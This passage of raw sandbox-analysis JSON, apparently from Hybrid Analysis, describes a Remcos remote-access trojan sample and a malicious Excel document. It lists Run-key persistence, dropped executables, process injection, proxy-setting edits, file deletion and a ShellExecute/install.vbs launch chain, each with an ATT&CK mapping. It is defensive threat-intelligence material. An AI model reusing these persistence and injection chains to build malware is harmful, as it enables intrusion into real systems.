\"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"hab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"REMCOS\"; Value: \"\"%APPDATA%\\remcos\\remcos.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 53248 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"remcos.exe\" wrote 53248 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"hab.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hab.exe]- [targetUID: 00000000-00003080]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00002528]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" has section name .text with entropy \"6.462991933\"\n \"hab.exe\" has section name .text with entropy \"6.462991933\"\n \"remcos.exe\" has section name .text with entropy \"6.462991933\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" spawned likely due to injection\n Process \"%TEMP%\\hab.exe\" spawned likely due to injection\n Process \"%APPDATA%\\remcos\\remcos.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"hab.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"hab.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"WScript.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"WScript.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"remcos.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"remcos.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"hab.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF9E8A0ED92299366A.TMP\" with delete access\n \"WScript.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" with delete access\n \"WScript.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\" with delete access\n \"hab.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF7A33955C845315B9.TMP\" with delete access\n \"hab.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFF69534B3D5B67931.TMP\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"hab.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF9E8A0ED92299366A.TMP\" for deletion\n \"WScript.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" for deletion\n \"WScript.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\" for deletion\n \"hab.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF7A33955C845315B9.TMP\" for deletion\n \"hab.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFF69534B3D5B67931.TMP\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00005840)\n \"hab.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\install.vbs (UID: 00000000-00006072)\n \"remcos.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00001464)\n \"hab.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\install.vbs (UID: 00000000-00003528)\n \"remcos.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00004516)\n \"hab.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\install.vbs (UID: 00000000-00003748)\n \"remcos.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\hab.exe (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (UID: 00000000-00005844)\n Spawned process \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (UID: 00000000-00005840)\n Spawned process \"hab.exe\" (UID: 00000000-00006044)\n Spawned process \"hab.exe\" (UID: 00000000-00006072)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003000)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00001212)\n Spawned process \"remcos.exe\" (UID: 00000000-00003276)\n Spawned process \"remcos.exe\" (UID: 00000000-00001464)\n Spawned process \"hab.exe\" (UID: 00000000-00004444)\n Spawned process \"hab.exe\" (UID: 00000000-00003528)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00000956)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00002108)\n Spawned process \"remcos.exe\" (UID: 00000000-00000888)\n Spawned process \"remcos.exe\" (UID: 00000000-00004516)\n Spawned process \"hab.exe\" (UID: 00000000-00003188)\n Spawned process \"hab.exe\" (UID: 00000000-00003748)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003080)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00000792)\n Spawned process \"remcos.exe\" (UID: 00000000-00002528)\n Spawned process \"remcos.exe\" (UID: 00000000-00001244)\n Spawned process \"hab.exe\" (UID: 00000000-00004280)\n Spawned process \"hab.exe\" (UID: 00000000-00003460)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 32 bytes to a remote process \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Handle: 384)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 52 bytes to a remote process \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Handle: 384)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 4 bytes to a remote process \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Handle: 384)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"hab.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 384)\n \"hab.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 384)\n \"hab.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 384)\n \"hab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 800)\n \"hab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 800)\n \"hab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 800)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 384)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 384)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 384)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 756)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 756)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 756)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\" (Handle: 752)\n \"hab.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 796)\n \"hab.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 796)\n \"hab.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 796)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"hab.exe\" allocated memory in \"%TEMP%\\hab.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835
https://hybrid-analysis.com/sample/f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835
Hybrid Analysis - Remcos
{"size": 1252864, "type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 00:00:00 2006, Last Saved Time/Date: Tue Feb 4 06:23:53 2025, Security: 1", "submit_name": "f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835", "sha256": "f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835", "av_detect": 70, "vx_family": "CVE-2017-0199", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "total_network_connections": 3, "total_processes": 1, "total_signatures": 48, "extracted_files": [{"name": "f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK", "file_path": "%APPDATA%\\Microsoft\\Office\\Recent\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK", "file_size": 733, "sha256": "c6c14e4a0ef57e190c9181a2c9002c3fed1ec800194ac20095b8aeca4adf51f9", "type_tags": ["lnk"], "description": "MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Feb 10 08:54:22 2025, mtime=Mon Feb 10 08:54:22 2025, atime=Mon Feb 10 07:54:20 2025, length=1252864, window=hide", "runtime_process": "EXCEL.EXE (PID: 5852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "index.dat", "file_path": "%APPDATA%\\Microsoft\\Office\\Recent\\index.dat", "file_size": 232, "sha256": "aeacfd720fb8ee8e12944c42192b31fba079ba7a7d461669084cd4306cf7cce7", "type_tags": ["data"], "description": "data", "runtime_process": "EXCEL.EXE (PID: 5852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6B235454.emf", "file_path": "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\6B235454.emf", "file_size": 2516184, "sha256": "f7c73aa536e7658b87cf7aa12c7612fd92bcf5b8ebf5f1cba97d72657da9c3c2", "type_tags": ["img", "image"], "description": "Windows Enhanced Metafile (EMF) image data version 0x10000", "runtime_process": "EXCEL.EXE (PID: 5852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "C098C045.emf", "file_path": "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\C098C045.emf", "file_size": 250880, "sha256": "3de337b08bf53bbb874375562451bd8cc7deb66b445473e11bd34fb653930374", "type_tags": ["img", "image"], "description": "Windows Enhanced Metafile (EMF) image data version 0x10000", "runtime_process": "EXCEL.EXE (PID: 5852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005852", "name": "EXCEL.EXE", "normalized_path": "%PROGRAMFILES%\\Microsoft Office\\Office14\\EXCEL.EXE", "command_line": "/dde", "sha256": "1c5409ec2a4b9d9ead080b65fc9aff4ce8dc276d922f14859de8661f5911bd79"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 1, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Exploitation for Client Execution", "attck_id": "T1203", "attck_id_wiki": "https://attack.mitre.org/techniques/T1203", "malicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\10MU_ACBPIDS_S-1-5-5-0-91343\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\10MU_ACB10_S-1-5-5-0-91343\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\552FFA80-3393-423d-8671-7BA046BB5906\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"\\Sessions\\1\\BaseNamedObjects\\KYIMEShareCachedData.MutexObject.%OSUSER%\"\n \"\\Sessions\\1\\BaseNamedObjects\\KYTransactionServer.MutexObject.%OSUSER%\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\MsoShellExtRegAccess_S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"Local\\10MU_ACB10_S-1-5-5-0-91343\"\n \"Global\\552FFA80-3393-423d-8671-7BA046BB5906\"\n \"KYTransactionServer.MutexObject.%OSUSER%\"\n \"Global\\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\10MU_ACBPIDS_S-1-5-5-0-91343\"\n \"KYIMEShareCachedData.MutexObject.%OSUSER%\"\n \"Global\\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"Global\\MsoShellExtRegAccess_S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=R10, O=Let's Encrypt, C=US\" (SHA1: 42:28:B4:44:9D:4E:F8:22:EB:07:D7:75:BA:8C:2D:E3:0A:9A:A9:82; see report for more information)\n The input sample is signed with a certificate issued by \"CN=ISRG Root X1, O=Internet Security Research Group, C=US\" (SHA1: 00:AB:EF:D0:55:F9:A9:C7:84:FF:DE:AB:D1:DC:DD:8F:ED:74:14:36; see report for more information)\n The input sample is signed with a certificate issued by \"CN=WE1, O=Google Trust Services, C=US\" (SHA1: DB:49:8C:37:9C:5B:0E:5C:AE:BA:6E:F1:E6:3A:B6:8F:89:F1:64:A2; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GTS Root R4, O=Google Trust Services LLC, C=US\" (SHA1: 10:8F:BF:79:4E:18:EC:53:47:A4:14:E4:37:0C:C4:50:6C:29:7A:B2; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE\" (SHA1: 93:2B:ED:33:9A:A6:92:12:C8:93:75:B7:93:04:B4:75:49:0B:89:A0; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"EXCEL.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70a80000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"EXCEL.EXE\" loaded module \"KERNEL32\" at base 77070000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b510000\n \"EXCEL.EXE\" loaded module \"COMCTL32.DLL\" at base 74610000\n \"EXCEL.EXE\" loaded module \"MSO.DLL\" at base 68a40000\n \"EXCEL.EXE\" loaded module \"KERNEL32.DLL\" at base 77070000\n \"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\CULTURES\\OFFICE.ODF\" at base 6efe0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"EXCEL.EXE\" loaded module \"DWMAPI.DLL\" at base 73ff0000\n \"EXCEL.EXE\" loaded module \"ADVAPI32.DLL\" at base 77380000\n \"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\1033\\MSOINTL.DLL\" at base 63c30000\n \"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSORES.DLL\" at base 5f700000\n \"EXCEL.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75610000\n \"EXCEL.EXE\" loaded module \"IMM32.DLL\" at base 75fb0000\n \"EXCEL.EXE\" loaded module \"CLBCATQ.DLL\" at base 75a80000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\MSIMTF.DLL\" at base 6d270000\n \"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\RICHED20.DLL\" at base 6a370000\n \"EXCEL.EXE\" loaded module \"GDIPLUS.DLL\" at base 740d0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 740d0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\MSCOREE.DLL\" at base 6c2d0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c240000\n \"EXCEL.EXE\" loaded module \"SHLWAPI.DLL\" at base 77a00000\n \"EXCEL.EXE\" loaded module 